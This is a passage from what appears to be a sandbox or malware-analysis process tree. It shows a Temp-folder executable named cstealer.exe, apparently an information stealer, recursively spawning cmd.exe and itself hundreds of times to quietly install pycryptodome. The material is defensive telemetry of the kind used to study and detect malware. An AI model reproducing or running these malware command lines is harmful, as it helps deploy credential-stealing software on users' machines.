        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        343⤵
        
        PID:15708
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        344⤵
        
        PID:15788
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        345⤵
        
        PID:15996
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        346⤵
        
        PID:16100
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        347⤵
        
        PID:16148
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        348⤵
        
        PID:16340
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        349⤵
        
        PID:15368
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        350⤵
        
        PID:15416
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        351⤵
        
        PID:15688
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        352⤵
        
        PID:15756
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        353⤵
        
        PID:15916
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        354⤵
        
        PID:16216
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        355⤵
        
        PID:16304
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        356⤵
        
        PID:6740
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        357⤵
        
        PID:9816
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        358⤵
        
        PID:3556
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        359⤵
        
        PID:16000
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        360⤵
        
        PID:16360
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        361⤵
        
        PID:15572
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        362⤵
        
        PID:15664
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        363⤵
        
        PID:16156
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        364⤵
        
        PID:16212
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        365⤵
        
        PID:5272
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        366⤵
        
        PID:14808
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        367⤵
        
        PID:15940
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        368⤵
        
        PID:10624
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        369⤵
        
        PID:13136
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        370⤵
        
        PID:11668
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        371⤵
        
        PID:15872
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        372⤵
        
        PID:11792
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        373⤵
        
        PID:4536
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        374⤵
        
        PID:15576
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        375⤵
        
        PID:4540
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        376⤵
        
        PID:3020
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        377⤵
        
        PID:11896
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        378⤵
        
        PID:4116
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        379⤵
        
        PID:9920
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        380⤵
        
        PID:11940
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        381⤵
        
        PID:16452
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        382⤵
        
        PID:16504
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        383⤵
        
        PID:16548
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        384⤵
        
        PID:16696
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        385⤵
        
        PID:16760
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        386⤵
        
        PID:16828
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        387⤵
        
        PID:17016
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        388⤵
        
        PID:17112
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        389⤵
        
        PID:17164
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        390⤵
        
        PID:17356
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        391⤵
        
        PID:17400
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        392⤵
        
        PID:16400
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        393⤵
        
        PID:13368
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        394⤵
        
        PID:16584
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        395⤵
        
        PID:16648
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        396⤵
        
        PID:16852
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        397⤵
        
        PID:16916
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        398⤵
        
        PID:16964
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        399⤵
        
        PID:16680
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        400⤵
        
        PID:17092
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        401⤵
        
        PID:10184
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        402⤵
        
        PID:17296
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        403⤵
        
        PID:12552
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        404⤵
        
        PID:13144
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        405⤵
        
        PID:6672
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        406⤵
        
        PID:5564
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        407⤵
        
        PID:16840
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        408⤵
        
        PID:16928
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        409⤵
        
        PID:7756
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        410⤵
        
        PID:12468
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        411⤵
        
        PID:17308
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        412⤵
        
        PID:6684
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        413⤵
        
        PID:7348
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        414⤵
        
        PID:16808
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        415⤵
        
        PID:4424
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        416⤵
        
        PID:7376
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        417⤵
        
        PID:3440
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        418⤵
        
        PID:11568
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        419⤵
        
        PID:17272
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        420⤵
        
        PID:13400
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        421⤵
        
        PID:3436
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        422⤵
        
        PID:6408
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        423⤵
        
        PID:12076
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        424⤵
        
        PID:9932
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        425⤵
        
        PID:10676
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        426⤵
        
        PID:8752
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        427⤵
        
        PID:13748
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        428⤵
        
        PID:16664
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        429⤵
        
        PID:9116
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        430⤵
        
        PID:14680
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        431⤵
        
        PID:7248
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        432⤵
        
        PID:3180
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        433⤵
        
        PID:10888
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        434⤵
        
        PID:2712
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        435⤵
        
        PID:7584
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        436⤵
        
        PID:3748
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        437⤵
        
        PID:8536
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        438⤵
        
        PID:14928
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        439⤵
        
        PID:3176
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        440⤵
        
        PID:17284
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        441⤵
        
        PID:15292
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        442⤵
        
        PID:11088
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        443⤵
        
        PID:6604
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        444⤵
        
        PID:14072
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        445⤵
        
        PID:10428
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        446⤵
        
        PID:7936
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        447⤵
        
        PID:14996
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        448⤵
        
        PID:9172
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        449⤵
        
        PID:7188
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        450⤵
        
        PID:14496
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        451⤵
        
        PID:8912
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        452⤵
        
        PID:14800
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        453⤵
        
        PID:3276
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        454⤵
        
        PID:6116
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        455⤵
        
        PID:7048
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        456⤵
        
        PID:5756
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        457⤵
        
        PID:6920
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        458⤵
        
        PID:12228
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        459⤵
        
        PID:5776
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        460⤵
        
        PID:14644
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        461⤵
        
        PID:4948
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        462⤵
        
        PID:17500
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        463⤵
        
        PID:17540
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        464⤵
        
        PID:17596
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        465⤵
        
        PID:17732
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        466⤵
        
        PID:17768
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        467⤵
        
        PID:17820
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        468⤵
        
        PID:17976
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        469⤵
        
        PID:18092
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        470⤵
        
        PID:18136
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        471⤵
        
        PID:18256
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        472⤵
        
        PID:18296
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        473⤵
        
        PID:18348
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        474⤵
        
        PID:17432
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        475⤵
        
        PID:17488
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        476⤵
        
        PID:17584
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        477⤵
        
        PID:18384
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        478⤵
        
        PID:696
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        479⤵
        
        PID:9232
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        480⤵
        
        PID:17712
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        481⤵
        
        PID:17760
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        482⤵
        
        PID:17868
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        483⤵
        
        PID:18020
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        484⤵
        
        PID:7128
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        485⤵
        
        PID:16332
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        486⤵
        
        PID:18276
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        487⤵
        
        PID:6332
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        488⤵
        
        PID:15508
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        489⤵
        
        PID:17680
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        490⤵
        
        PID:17784
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        491⤵
        
        PID:5668
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        492⤵
        
        PID:18152
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        493⤵
        
        PID:18232
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        494⤵
        
        PID:12592
        
